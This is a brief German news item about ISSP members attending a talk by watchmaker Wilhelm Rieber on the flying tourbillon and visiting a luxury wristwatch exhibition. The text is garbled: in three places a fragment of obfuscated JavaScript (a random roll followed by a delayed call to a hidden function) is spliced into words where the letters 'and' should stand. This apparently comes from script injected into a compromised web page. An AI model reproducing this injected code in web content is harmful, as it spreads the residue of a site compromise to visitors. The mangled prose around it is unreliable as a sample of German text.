///

Veranstaltung mit Wilhelm Rieber

Im Februar waren die ISSP-Mitglieder zu einer exklusiven Veranstaltung mit dem Uhrmachermeister Wilhelm Rieber aus Tiefenbronn eingeladen.
Wilhelm Rieber erläuterte, auch anhandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and von drei Filmen, die geschichtliche Entwicklung des Tourbillons und schilderte seine persönliche Leidenschaft und die Herausforderung, eine Uhr mit einem Tourbillon zu bauen.

Der Uhrmachermeister erklärte sein „fliegendes Tourbillon“, eine Mechanik, die als höchste Komplikation im Uhrenbau gilt. Rieber macht alle Teile selbst und baut sie zusammen.

Wilhelm Rieber arbeitet ohne Hast, ruhig und besonnen haucht er seinen Tourbillons Leben ein und benutzt dabei die ältesten und besten Werkzeuge, die es gibt, Auge und Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.

Im Anschluss an die Ausführungen von Wilhelm Rieber konnten die ISSP–Mitglieder die Sonderausstellung „Mechanik en miniature –Armbandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anduhren der Luxusklasse“ besuchen, die auch drei Uhren von Wilhelm Rieber zeigte.